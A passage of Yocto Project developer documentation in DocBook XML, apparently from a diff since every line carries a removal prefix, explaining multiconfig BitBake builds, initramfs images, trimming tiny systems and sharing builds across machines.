- For information on BitBake, see the
- <ulink url='&YOCTO_DOCS_BB_URL;'>BitBake User Manual</ulink>.
- </note>
- The <replaceable>target</replaceable> is the name of the
- recipe you want to build.
- Common targets are the images in
- <filename>meta/recipes-core/images</filename>,
- <filename>meta/recipes-sato/images</filename>, and so
- forth all found in the
- <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>.
- Or, the target can be the name of a recipe for a
- specific piece of software such as BusyBox.
- For more details about the images the OpenEmbedded build
- system supports, see the
- "<ulink url='&YOCTO_DOCS_REF_URL;#ref-images'>Images</ulink>"
- chapter in the Yocto Project Reference Manual.</para>
-
- <para>As an example, the following command builds the
- <filename>core-image-minimal</filename> image:
- <literallayout class='monospaced'>
- $ bitbake core-image-minimal
- </literallayout>
- Once an image has been built, it often needs to be
- installed.
- The images and kernels built by the OpenEmbedded
- build system are placed in the Build Directory in
- <filename class="directory">tmp/deploy/images</filename>.
- For information on how to run pre-built images such as
- <filename>qemux86</filename> and <filename>qemuarm</filename>,
- see the
- <ulink url='&YOCTO_DOCS_SDK_URL;'>Yocto Project Application Development and the Extensible Software Development Kit (eSDK)</ulink>
- manual.
- For information about how to install these images,
- see the documentation for your particular board or
- machine.
- </para></listitem>
- </orderedlist>
- </para>
- </section>
-
- <section id='dev-building-images-for-multiple-targets-using-multiple-configurations'>
- <title>Building Images for Multiple Targets Using Multiple Configurations</title>
-
- <para>
- You can use a single <filename>bitbake</filename> command
- to build multiple images or packages for different targets
- where each image or package requires a different configuration
- (multiple configuration builds).
- The builds, in this scenario, are sometimes referred to as
- "multiconfigs", and this section uses that term throughout.
- </para>
-
- <para>
- This section describes how to set up for multiple
- configuration builds and how to account for cross-build
- dependencies between the multiconfigs.
- </para>
-
- <section id='dev-setting-up-and-running-a-multiple-configuration-build'>
- <title>Setting Up and Running a Multiple Configuration Build</title>
-
- <para>
- To accomplish a multiple configuration build, you must
- define each target's configuration separately using
- a parallel configuration file in the
- <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>,
- and you must follow a required file hierarchy.
- Additionally, you must enable the multiple configuration
- builds in your <filename>local.conf</filename> file.
- </para>
-
- <para>
- Follow these steps to set up and execute multiple
- configuration builds:
- <itemizedlist>
- <listitem><para>
- <emphasis>Create Separate Configuration Files</emphasis>:
- You need to create a single configuration file for
- each build target (each multiconfig).
- Minimally, each configuration file must define the
- machine and the temporary directory BitBake uses
- for the build.
- Suggested practice dictates that you do not
- overlap the temporary directories
- used during the builds.
- However, it is possible that you can share the
- temporary directory
- (<ulink url='&YOCTO_DOCS_REF_URL;#var-TMPDIR'><filename>TMPDIR</filename></ulink>).
- For example, consider a scenario with two
- different multiconfigs for the same
- <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE'><filename>MACHINE</filename></ulink>: "qemux86" built for
- two distributions such as "poky" and "poky-lsb".
- In this case, you might want to use the same
- <filename>TMPDIR</filename>.</para>
-
- <para>Here is an example showing the minimal
- statements needed in a configuration file for
- a "qemux86" target whose temporary build directory
- is <filename>tmpmultix86</filename>:
- <literallayout class='monospaced'>
- MACHINE="qemux86"
- TMPDIR="${TOPDIR}/tmpmultix86"
- </literallayout></para>
-
- <para>The location for these multiconfig
- configuration files is specific.
- They must reside in the current build directory in
- a sub-directory of <filename>conf</filename> named
- <filename>multiconfig</filename>.
- Following is an example that defines two
- configuration files for the "x86" and "arm"
- multiconfigs:
- <imagedata fileref="figures/multiconfig_files.png" align="center" width="4in" depth="3in" />
- </para>
-
- <para>The reason for this required file hierarchy
- is because the <filename>BBPATH</filename> variable
- is not constructed until the layers are parsed.
- Consequently, using the configuration file as a
- pre-configuration file is not possible unless it is
- located in the current working directory.
- </para></listitem>
- <listitem><para>
- <emphasis>Add the BitBake Multi-configuration Variable to the Local Configuration File</emphasis>:
- Use the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-BBMULTICONFIG'><filename>BBMULTICONFIG</filename></ulink>
- variable in your
- <filename>conf/local.conf</filename> configuration
- file to specify each multiconfig.
- Continuing with the example from the previous
- figure, the <filename>BBMULTICONFIG</filename>
- variable needs to enable two multiconfigs: "x86"
- and "arm" by specifying each configuration file:
- <literallayout class='monospaced'>
- BBMULTICONFIG = "x86 arm"
- </literallayout>
- <note>
- A "default" configuration already exists by
- definition.
- This configuration is named: "" (i.e. empty
- string) and is defined by the variables coming
- from your <filename>local.conf</filename> file.
- Consequently, the previous example actually
- adds two additional configurations to your
- build: "arm" and "x86" along with "".
- </note>
- </para></listitem>
- <listitem><para>
- <emphasis>Launch BitBake</emphasis>:
- Use the following BitBake command form to launch the
- multiple configuration build:
- <literallayout class='monospaced'>
- $ bitbake [mc:<replaceable>multiconfigname</replaceable>:]<replaceable>target</replaceable> [[[mc:<replaceable>multiconfigname</replaceable>:]<replaceable>target</replaceable>] ... ]
- </literallayout>
- For the example in this section, the following
- command applies:
- <literallayout class='monospaced'>
- $ bitbake mc:x86:core-image-minimal mc:arm:core-image-sato mc::core-image-base
- </literallayout>
- The previous BitBake command builds a
- <filename>core-image-minimal</filename> image that
- is configured through the
- <filename>x86.conf</filename> configuration file,
- a <filename>core-image-sato</filename>
- image that is configured through the
- <filename>arm.conf</filename> configuration file
- and a <filename>core-image-base</filename> that is
- configured through your
- <filename>local.conf</filename> configuration file.
- </para></listitem>
- </itemizedlist>
- <note>
- Support for multiple configuration builds in the
- Yocto Project &DISTRO; (&DISTRO_NAME;) Release does
- not include Shared State (sstate) optimizations.
- Consequently, if a build uses the same object twice
- in, for example, two different
- <filename>TMPDIR</filename> directories, the build
- either loads from an existing sstate cache for that
- build at the start or builds the object fresh.
- </note>
- </para>
- </section>
-
- <section id='dev-enabling-multiple-configuration-build-dependencies'>
- <title>Enabling Multiple Configuration Build Dependencies</title>
-
- <para>
- Sometimes dependencies can exist between targets
- (multiconfigs) in a multiple configuration build.
- For example, suppose that in order to build a
- <filename>core-image-sato</filename> image for an "x86"
- multiconfig, the root filesystem of an "arm"
- multiconfig must exist.
- This dependency is essentially that the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-image'><filename>do_image</filename></ulink>
- task in the <filename>core-image-sato</filename> recipe
- depends on the completion of the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-rootfs'><filename>do_rootfs</filename></ulink>
- task of the <filename>core-image-minimal</filename>
- recipe.
- </para>
-
- <para>
- To enable dependencies in a multiple configuration
- build, you must declare the dependencies in the recipe
- using the following statement form:
- <literallayout class='monospaced'>
- <replaceable>task_or_package</replaceable>[mcdepends] = "mc:<replaceable>from_multiconfig</replaceable>:<replaceable>to_multiconfig</replaceable>:<replaceable>recipe_name</replaceable>:<replaceable>task_on_which_to_depend</replaceable>"
- </literallayout>
- To better show how to use this statement, consider the
- example scenario from the first paragraph of this section.
- The following statement needs to be added to the recipe
- that builds the <filename>core-image-sato</filename>
- image:
- <literallayout class='monospaced'>
- do_image[mcdepends] = "mc:x86:arm:core-image-minimal:do_rootfs"
- </literallayout>
- In this example, the
- <replaceable>from_multiconfig</replaceable> is "x86".
- The <replaceable>to_multiconfig</replaceable> is "arm".
- The task on which the <filename>do_image</filename> task
- in the recipe depends is the <filename>do_rootfs</filename>
- task from the <filename>core-image-minimal</filename>
- recipe associated with the "arm" multiconfig.
- </para>
-
- <para>
- Once you set up this dependency, you can build the
- "x86" multiconfig using a BitBake command as follows:
- <literallayout class='monospaced'>
- $ bitbake mc:x86:core-image-sato
- </literallayout>
- This command executes all the tasks needed to create
- the <filename>core-image-sato</filename> image for the
- "x86" multiconfig.
- Because of the dependency, BitBake also executes through
- the <filename>do_rootfs</filename> task for the "arm"
- multiconfig build.
- </para>
-
- <para>
- Having a recipe depend on the root filesystem of another
- build might not seem that useful.
- Consider this change to the statement in the
- <filename>core-image-sato</filename> recipe:
- <literallayout class='monospaced'>
- do_image[mcdepends] = "mc:x86:arm:core-image-minimal:do_image"
- </literallayout>
- In this case, BitBake must create the
- <filename>core-image-minimal</filename> image for the
- "arm" build since the "x86" build depends on it.
- </para>
-
- <para>
- Because "x86" and "arm" are enabled for multiple
- configuration builds and have separate configuration
- files, BitBake places the artifacts for each build in the
- respective temporary build directories (i.e.
- <ulink url='&YOCTO_DOCS_REF_URL;#var-TMPDIR'><filename>TMPDIR</filename></ulink>).
- </para>
- </section>
- </section>
-
- <section id='building-an-initramfs-image'>
- <title>Building an Initial RAM Filesystem (initramfs) Image</title>
-
- <para>
- An initial RAM filesystem (initramfs) image provides a temporary
- root filesystem used for early system initialization (e.g.
- loading of modules needed to locate and mount the "real" root
- filesystem).
- <note>
- The initramfs image is the successor of initial RAM disk
- (initrd).
- It is a "copy in and out" (cpio) archive of the initial
- filesystem that gets loaded into memory during the Linux
- startup process.
- Because Linux uses the contents of the archive during
- initialization, the initramfs image needs to contain all of the
- device drivers and tools needed to mount the final root
- filesystem.
- </note>
- </para>
-
- <para>
- Follow these steps to create an initramfs image:
- <orderedlist>
- <listitem><para>
- <emphasis>Create the initramfs Image Recipe:</emphasis>
- You can reference the
- <filename>core-image-minimal-initramfs.bb</filename>
- recipe found in the <filename>meta/recipes-core</filename>
- directory of the
- <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>
- as an example from which to work.
- </para></listitem>
- <listitem><para>
- <emphasis>Decide if You Need to Bundle the initramfs Image
- Into the Kernel Image:</emphasis>
- If you want the initramfs image that is built to be
- bundled in with the kernel image, set the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-INITRAMFS_IMAGE_BUNDLE'><filename>INITRAMFS_IMAGE_BUNDLE</filename></ulink>
- variable to "1" in your <filename>local.conf</filename>
- configuration file and set the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-INITRAMFS_IMAGE'><filename>INITRAMFS_IMAGE</filename></ulink>
- variable in the recipe that builds the kernel image.
- <note><title>Tip</title>
- It is recommended that you do bundle the initramfs
- image with the kernel image to avoid circular
- dependencies between the kernel recipe and the
- initramfs recipe should the initramfs image
- include kernel modules.
- </note>
- Setting the <filename>INITRAMFS_IMAGE_BUNDLE</filename>
- flag causes the initramfs image to be unpacked
- into the <filename>${B}/usr/</filename> directory.
- The unpacked initramfs image is then passed to the kernel's
- <filename>Makefile</filename> using the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-CONFIG_INITRAMFS_SOURCE'><filename>CONFIG_INITRAMFS_SOURCE</filename></ulink>
- variable, allowing the initramfs image to be built into
- the kernel normally.
- <note>
- If you choose to not bundle the initramfs image with
- the kernel image, you are essentially using an
- <ulink url='https://en.wikipedia.org/wiki/Initrd'>Initial RAM Disk (initrd)</ulink>.
- Creating an initrd is handled primarily through the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-INITRD_IMAGE'><filename>INITRD_IMAGE</filename></ulink>,
- <filename>INITRD_LIVE</filename>, and
- <filename>INITRD_IMAGE_LIVE</filename> variables.
- For more information, see the
- <ulink url='&YOCTO_GIT_URL;/cgit/cgit.cgi/poky/tree/meta/classes/image-live.bbclass'><filename>image-live.bbclass</filename></ulink>
- file.
- </note>
- </para></listitem>
- <listitem><para>
- <emphasis>Optionally Add Items to the initramfs Image
- Through the initramfs Image Recipe:</emphasis>
- If you add items to the initramfs image by way of its
- recipe, you should use
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_INSTALL'><filename>PACKAGE_INSTALL</filename></ulink>
- rather than
- <ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_INSTALL'><filename>IMAGE_INSTALL</filename></ulink>.
- <filename>PACKAGE_INSTALL</filename> gives more direct
- control of what is added to the image as compared to
- the defaults you might not necessarily want that are
- set by the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-image'><filename>image</filename></ulink>
- or
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-core-image'><filename>core-image</filename></ulink>
- classes.
- </para></listitem>
- <listitem><para>
- <emphasis>Build the Kernel Image and the initramfs
- Image:</emphasis>
- Build your kernel image using BitBake.
- Because the initramfs image recipe is a dependency of the
- kernel image, the initramfs image is built as well and
- bundled with the kernel image if you used the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-INITRAMFS_IMAGE_BUNDLE'><filename>INITRAMFS_IMAGE_BUNDLE</filename></ulink>
- variable described earlier.
- </para></listitem>
- </orderedlist>
- </para>
- </section>
-
- <section id='building-a-tiny-system'>
- <title>Building a Tiny System</title>
-
- <para>
- Very small distributions have some significant advantages such
- as requiring less on-die or in-package memory (cheaper), better
- performance through efficient cache usage, lower power requirements
- due to less memory, faster boot times, and reduced development
- overhead.
- Some real-world examples where a very small distribution gives
- you distinct advantages are digital cameras, medical devices,
- and small headless systems.
- </para>
-
- <para>
- This section presents information that shows you how you can
- trim your distribution to even smaller sizes than the
- <filename>poky-tiny</filename> distribution, which is around
- 5 Mbytes, that can be built out-of-the-box using the Yocto Project.
- </para>
-
- <section id='tiny-system-overview'>
- <title>Overview</title>
-
- <para>
- The following list presents the overall steps you need to
- consider and perform to create distributions with smaller
- root filesystems, achieve faster boot times, maintain your critical
- functionality, and avoid initial RAM disks:
- <itemizedlist>
- <listitem><para>
- <link linkend='goals-and-guiding-principles'>Determine your goals and guiding principles.</link>
- </para></listitem>
- <listitem><para>
- <link linkend='understand-what-gives-your-image-size'>Understand what contributes to your image size.</link>
- </para></listitem>
- <listitem><para>
- <link linkend='trim-the-root-filesystem'>Reduce the size of the root filesystem.</link>
- </para></listitem>
- <listitem><para>
- <link linkend='trim-the-kernel'>Reduce the size of the kernel.</link>
- </para></listitem>
- <listitem><para>
- <link linkend='remove-package-management-requirements'>Eliminate packaging requirements.</link>
- </para></listitem>
- <listitem><para>
- <link linkend='look-for-other-ways-to-minimize-size'>Look for other ways to minimize size.</link>
- </para></listitem>
- <listitem><para>
- <link linkend='iterate-on-the-process'>Iterate on the process.</link>
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='goals-and-guiding-principles'>
- <title>Goals and Guiding Principles</title>
-
- <para>
- Before you can reach your destination, you need to know
- where you are going.
- Here is an example list that you can use as a guide when
- creating very small distributions:
- <itemizedlist>
- <listitem><para>Determine how much space you need
- (e.g. a kernel that is 1 Mbyte or less and
- a root filesystem that is 3 Mbytes or less).
- </para></listitem>
- <listitem><para>Find the areas that are currently
- taking 90% of the space and concentrate on reducing
- those areas.
- </para></listitem>
- <listitem><para>Do not create any difficult "hacks"
- to achieve your goals.</para></listitem>
- <listitem><para>Leverage the device-specific
- options.</para></listitem>
- <listitem><para>Work in a separate layer so that you
- keep changes isolated.
- For information on how to create layers, see
- the "<link linkend='understanding-and-creating-layers'>Understanding and Creating Layers</link>" section.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='understand-what-gives-your-image-size'>
- <title>Understand What Contributes to Your Image Size</title>
-
- <para>
- It is easiest to have something to start with when creating
- your own distribution.
- You can use the Yocto Project out-of-the-box to create the
- <filename>poky-tiny</filename> distribution.
- Ultimately, you will want to make changes in your own
- distribution that are likely modeled after
- <filename>poky-tiny</filename>.
- <note>
- To use <filename>poky-tiny</filename> in your build,
- set the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-DISTRO'><filename>DISTRO</filename></ulink>
- variable in your
- <filename>local.conf</filename> file to "poky-tiny"
- as described in the
- "<link linkend='creating-your-own-distribution'>Creating Your Own Distribution</link>"
- section.
- </note>
- </para>
-
- <para>
- Understanding some memory concepts will help you reduce the
- system size.
- Memory consists of static, dynamic, and temporary memory.
- Static memory is the TEXT (code), DATA (initialized data
- in the code), and BSS (uninitialized data) sections.
- Dynamic memory represents memory that is allocated at runtime:
- stacks, hash tables, and so forth.
- Temporary memory is recovered after the boot process.
- This memory consists of memory used for decompressing
- the kernel and for the <filename>__init__</filename>
- functions.
- </para>
-
- <para>
- To help you see where you currently are with kernel and root
- filesystem sizes, you can use two tools found in the
- <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink> in
- the <filename>scripts/tiny/</filename> directory:
- <itemizedlist>
- <listitem><para><filename>ksize.py</filename>: Reports
- component sizes for the kernel build objects.
- </para></listitem>
- <listitem><para><filename>dirsize.py</filename>: Reports
- component sizes for the root filesystem.</para></listitem>
- </itemizedlist>
- This next tool and command help you organize configuration
- fragments and view file dependencies in a human-readable form:
- <itemizedlist>
- <listitem><para><filename>merge_config.sh</filename>:
- Helps you manage configuration files and fragments
- within the kernel.
- With this tool, you can merge individual configuration
- fragments together.
- The tool allows you to make overrides and warns you
- of any missing configuration options.
- The tool is ideal for allowing you to iterate on
- configurations, create minimal configurations, and
- create configuration files for different machines
- without having to duplicate your process.</para>
- <para>The <filename>merge_config.sh</filename> script is
- part of the Linux Yocto kernel Git repositories
- (i.e. <filename>linux-yocto-3.14</filename>,
- <filename>linux-yocto-3.10</filename>,
- <filename>linux-yocto-3.8</filename>, and so forth)
- in the
- <filename>scripts/kconfig</filename> directory.</para>
- <para>For more information on configuration fragments,
- see the
- "<ulink url='&YOCTO_DOCS_KERNEL_DEV_URL;#creating-config-fragments'>Creating Configuration Fragments</ulink>"
- section in the Yocto Project Linux Kernel Development
- Manual.
- </para></listitem>
- <listitem><para><filename>bitbake -u taskexp -g <replaceable>bitbake_target</replaceable></filename>:
- Using the BitBake command with these options brings up
- a Dependency Explorer from which you can view file
- dependencies.
- Understanding these dependencies allows you to make
- informed decisions when cutting out various pieces of the
- kernel and root filesystem.</para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='trim-the-root-filesystem'>
- <title>Trim the Root Filesystem</title>
-
- <para>
- The root filesystem is made up of packages for booting,
- libraries, and applications.
- To change things, you can configure how the packaging happens,
- which changes the way you build them.
- You can also modify the filesystem itself or select a different
- filesystem.
- </para>
-
- <para>
- First, find out what is hogging your root filesystem by running the
- <filename>dirsize.py</filename> script from your root directory:
- <literallayout class='monospaced'>
- $ cd <replaceable>root-directory-of-image</replaceable>
- $ dirsize.py 100000 > dirsize-100k.log
- $ cat dirsize-100k.log
- </literallayout>
- You can apply a filter to the script to ignore files under
- a certain size.
- The previous example filters out any files below 100 Kbytes.
- The sizes reported by the tool are uncompressed, and thus
- will be smaller by a relatively constant factor in a
- compressed root filesystem.
- When you examine your log file, you can focus on areas of the
- root filesystem that take up large amounts of memory.
- </para>
-
- <para>
- You need to be sure that what you eliminate does not cripple
- the functionality you need.
- One way to see how packages relate to each other is by using
- the Dependency Explorer UI with the BitBake command:
- <literallayout class='monospaced'>
- $ cd <replaceable>image-directory</replaceable>
- $ bitbake -u taskexp -g <replaceable>image</replaceable>
- </literallayout>
- Use the interface to select potential packages you wish to
- eliminate and see their dependency relationships.
- </para>
-
- <para>
- When deciding how to reduce the size, get rid of packages that
- result in minimal impact on the feature set.
- For example, you might not need a VGA display.
- Or, you might be able to get by with <filename>devtmpfs</filename>
- and <filename>mdev</filename> instead of
- <filename>udev</filename>.
- </para>
-
- <para>
- Use your <filename>local.conf</filename> file to make changes.
- For example, to eliminate <filename>udev</filename> and
- <filename>glib</filename>, set the following in the
- local configuration file:
- <literallayout class='monospaced'>
- VIRTUAL-RUNTIME_dev_manager = ""
- </literallayout>
- </para>
-
- <para>
- Finally, you should consider exactly the type of root
- filesystem you need to meet your needs while also reducing
- its size.
- For example, consider <filename>cramfs</filename>,
- <filename>squashfs</filename>, <filename>ubifs</filename>,
- <filename>ext2</filename>, or an <filename>initramfs</filename>
- using <filename>initramfs</filename>.
- Be aware that <filename>ext3</filename> requires a 1 Mbyte
- journal.
- If you are okay with running read-only, you do not need this
- journal.
- </para>
-
- <note>
- After each round of elimination, you need to rebuild your
- system and then use the tools to see the effects of your
- reductions.
- </note>
- </section>
-
- <section id='trim-the-kernel'>
- <title>Trim the Kernel</title>
-
- <para>
- The kernel is built by including policies for hardware-independent
- aspects.
- What subsystems do you enable?
- For what architecture are you building?
- Which drivers do you build by default?
- <note>You can modify the kernel source if you want to help
- with boot time.
- </note>
- </para>
-
- <para>
- Run the <filename>ksize.py</filename> script from the top-level
- Linux build directory to get an idea of what is making up
- the kernel:
- <literallayout class='monospaced'>
- $ cd <replaceable>top-level-linux-build-directory</replaceable>
- $ ksize.py > ksize.log
- $ cat ksize.log
- </literallayout>
- When you examine the log, you will see how much space is
- taken up with the built-in <filename>.o</filename> files for
- drivers, networking, core kernel files, filesystem, sound,
- and so forth.
- The sizes reported by the tool are uncompressed, and thus
- will be smaller by a relatively constant factor in a compressed
- kernel image.
- Look to reduce the areas that are large and taking up around
- the "90% rule."
- </para>
-
- <para>
- To examine, or drill down, into any particular area, use the
- <filename>-d</filename> option with the script:
- <literallayout class='monospaced'>
- $ ksize.py -d > ksize.log
- </literallayout>
- Using this option breaks out the individual file information
- for each area of the kernel (e.g. drivers, networking, and
- so forth).
- </para>
-
- <para>
- Use your log file to see what you can eliminate from the kernel
- based on features you can let go.
- For example, if you are not going to need sound, you do not
- need any drivers that support sound.
- </para>
-
- <para>
- After figuring out what to eliminate, you need to reconfigure
- the kernel to reflect those changes during the next build.
- You could run <filename>menuconfig</filename> and make all your
- changes at once.
- However, that makes it difficult to see the effects of your
- individual eliminations and also makes it difficult to replicate
- the changes for perhaps another target device.
- A better method is to start with no configurations using
- <filename>allnoconfig</filename>, create configuration
- fragments for individual changes, and then manage the
- fragments into a single configuration file using
- <filename>merge_config.sh</filename>.
- The tool makes it easy for you to iterate using the
- configuration change and build cycle.
- </para>
-
- <para>
- Each time you make configuration changes, you need to rebuild
- the kernel and check to see what impact your changes had on
- the overall size.
- </para>
- </section>
-
- <section id='remove-package-management-requirements'>
- <title>Remove Package Management Requirements</title>
-
- <para>
- Packaging requirements add size to the image.
- One way to reduce the size of the image is to remove all the
- packaging requirements from the image.
- This reduction includes both removing the package manager
- and its unique dependencies as well as removing the package
- management data itself.
- </para>
-
- <para>
- To eliminate all the packaging requirements for an image,
- be sure that "package-management" is not part of your
- <ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_FEATURES'><filename>IMAGE_FEATURES</filename></ulink>
- statement for the image.
- When you remove this feature, you are removing the package
- manager as well as its dependencies from the root filesystem.
- </para>
- </section>
-
- <section id='look-for-other-ways-to-minimize-size'>
- <title>Look for Other Ways to Minimize Size</title>
-
- <para>
- Depending on your particular circumstances, other areas that you
- can trim likely exist.
- The key to finding these areas is through tools and methods
- described here combined with experimentation and iteration.
- Here are a couple of areas to experiment with:
- <itemizedlist>
- <listitem><para><filename>glibc</filename>:
- In general, follow this process:
- <orderedlist>
- <listitem><para>Remove <filename>glibc</filename>
- features from
- <ulink url='&YOCTO_DOCS_REF_URL;#var-DISTRO_FEATURES'><filename>DISTRO_FEATURES</filename></ulink>
- that you think you do not need.</para></listitem>
- <listitem><para>Build your distribution.
- </para></listitem>
- <listitem><para>If the build fails due to missing
- symbols in a package, determine if you can
- reconfigure the package to not need those
- features.
- For example, change the configuration to not
- support wide character support as is done for
- <filename>ncurses</filename>.
- Or, if support for those characters is needed,
- determine what <filename>glibc</filename>
- features provide the support and restore the
- configuration.
- </para></listitem>
- <listitem><para>Rebuild and repeat the process.
- </para></listitem>
- </orderedlist></para></listitem>
- <listitem><para><filename>busybox</filename>:
- For BusyBox, use a process similar as described for
- <filename>glibc</filename>.
- A difference is you will need to boot the resulting
- system to see if you are able to do everything you
- expect from the running system.
- You need to be sure to integrate configuration fragments
- into Busybox because BusyBox handles its own core
- features and then allows you to add configuration
- fragments on top.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='iterate-on-the-process'>
- <title>Iterate on the Process</title>
-
- <para>
- If you have not reached your goals on system size, you need
- to iterate on the process.
- The process is the same.
- Use the tools and see just what is taking up 90% of the root
- filesystem and the kernel.
- Decide what you can eliminate without limiting your device
- beyond what you need.
- </para>
-
- <para>
- Depending on your system, a good place to look might be
- Busybox, which provides a stripped down
- version of Unix tools in a single, executable file.
- You might be able to drop virtual terminal services or perhaps
- ipv6.
- </para>
- </section>
- </section>
-
- <section id='building-images-for-more-than-one-machine'>
- <title>Building Images for More than One Machine</title>
-
- <para>
- A common scenario developers face is creating images for several
- different machines that use the same software environment.
- In this situation, it is tempting to set the
- tunings and optimization flags for each build specifically for
- the targeted hardware (i.e. "maxing out" the tunings).
- Doing so can considerably add to build times and package feed
- maintenance collectively for the machines.
- For example, selecting tunes that are extremely specific to a
- CPU core used in a system might enable some micro optimizations
- in GCC for that particular system but would otherwise not gain
- you much of a performance difference across the other systems
- as compared to using a more general tuning across all the builds
- (e.g. setting
- <ulink url='&YOCTO_DOCS_REF_URL;#var-DEFAULTTUNE'><filename>DEFAULTTUNE</filename></ulink>
- specifically for each machine's build).
- Rather than "max out" each build's tunings, you can take steps that
- cause the OpenEmbedded build system to reuse software across the
- various machines where it makes sense.
- </para>
-
- <para>
- If build speed and package feed maintenance are considerations,
- you should consider the points in this section that can help you
- optimize your tunings to best consider build times and package
- feed maintenance.
- <itemizedlist>
- <listitem><para>
- <emphasis>Share the Build Directory:</emphasis>
- If at all possible, share the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-TMPDIR'><filename>TMPDIR</filename></ulink>
- across builds.
- The Yocto Project supports switching between different
- <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE'><filename>MACHINE</filename></ulink>
- values in the same <filename>TMPDIR</filename>.
- This practice is well supported and regularly used by
- developers when building for multiple machines.
- When you use the same <filename>TMPDIR</filename> for
- multiple machine builds, the OpenEmbedded build system can
- reuse the existing native and often cross-recipes for
- multiple machines.
- Thus, build time decreases.
- <note>
- If
- <ulink url='&YOCTO_DOCS_REF_URL;#var-DISTRO'><filename>DISTRO</filename></ulink>
- settings change or fundamental configuration settings
- such as the filesystem layout, you need to work with
- a clean <filename>TMPDIR</filename>.
- Sharing <filename>TMPDIR</filename> under these
- circumstances might work but since it is not
- guaranteed, you should use a clean
- <filename>TMPDIR</filename>.
- </note>
- </para></listitem>
- <listitem><para>
- <emphasis>Enable the Appropriate Package Architecture:</emphasis>
- By default, the OpenEmbedded build system enables three
- levels of package architectures: "all", "tune" or "package",
- and "machine".
- Any given recipe usually selects one of these package
- architectures (types) for its output.
- Depending for what a given recipe creates packages, making
- sure you enable the appropriate package architecture can
- directly impact the build time.</para>
-
- <para>A recipe that just generates scripts can enable
- "all" architecture because there are no binaries to build.
- To specifically enable "all" architecture, be sure your
- recipe inherits the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-allarch'><filename>allarch</filename></ulink>
- class.
- This class is useful for "all" architectures because it
- configures many variables so packages can be used across
- multiple architectures.</para>
-
- <para>If your recipe needs to generate packages that are
- machine-specific or when one of the build or runtime
- dependencies is already machine-architecture dependent,
- which makes your recipe also machine-architecture dependent,
- make sure your recipe enables the "machine" package
- architecture through the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE_ARCH'><filename>MACHINE_ARCH</filename></ulink>
- variable:
- <literallayout class='monospaced'>
- PACKAGE_ARCH = "${MACHINE_ARCH}"
- </literallayout>
- When you do not specifically enable a package
- architecture through the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_ARCH'><filename>PACKAGE_ARCH</filename></ulink>,
- The OpenEmbedded build system defaults to the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-TUNE_PKGARCH'><filename>TUNE_PKGARCH</filename></ulink>
- setting:
- <literallayout class='monospaced'>
- PACKAGE_ARCH = "${TUNE_PKGARCH}"
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis>Choose a Generic Tuning File if Possible:</emphasis>
- Some tunes are more generic and can run on multiple targets
- (e.g. an <filename>armv5</filename> set of packages could
- run on <filename>armv6</filename> and
- <filename>armv7</filename> processors in most cases).
- Similarly, <filename>i486</filename> binaries could work
- on <filename>i586</filename> and higher processors.
- You should realize, however, that advances on newer
- processor versions would not be used.</para>
-
- <para>If you select the same tune for several different
- machines, the OpenEmbedded build system reuses software
- previously built, thus speeding up the overall build time.
- Realize that even though a new sysroot for each machine is
- generated, the software is not recompiled and only one
- package feed exists.
- </para></listitem>
- <listitem><para>
- <emphasis>Manage Granular Level Packaging:</emphasis>
- Sometimes cases exist where injecting another level of
- package architecture beyond the three higher levels noted
- earlier can be useful.
- For example, consider how NXP (formerly Freescale) allows
- for the easy reuse of binary packages in their layer
- <ulink url='&YOCTO_GIT_URL;/cgit/cgit.cgi/meta-freescale/'><filename>meta-freescale</filename></ulink>.
- In this example, the
- <ulink url='&YOCTO_GIT_URL;/cgit/cgit.cgi/meta-freescale/tree/classes/fsl-dynamic-packagearch.bbclass'><filename>fsl-dynamic-packagearch</filename></ulink>
- class shares GPU packages for i.MX53 boards because
- all boards share the AMD GPU.
- The i.MX6-based boards can do the same because all boards
- share the Vivante GPU.
- This class inspects the BitBake datastore to identify if
- the package provides or depends on one of the
- sub-architecture values.
- If so, the class sets the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_ARCH'><filename>PACKAGE_ARCH</filename></ulink>
- value based on the <filename>MACHINE_SUBARCH</filename>
- value.
- If the package does not provide or depend on one of the
- sub-architecture values but it matches a value in the
- machine-specific filter, it sets
- <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE_ARCH'><filename>MACHINE_ARCH</filename></ulink>.
- This behavior reduces the number of packages built and
- saves build time by reusing binaries.
- </para></listitem>
- <listitem><para>
- <emphasis>Use Tools to Debug Issues:</emphasis>
- Sometimes you can run into situations where software is
- being rebuilt when you think it should not be.
- For example, the OpenEmbedded build system might not be
- using shared state between machines when you think it
- should be.
- These types of situations are usually due to references
- to machine-specific variables such as
- <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE'><filename>MACHINE</filename></ulink>,
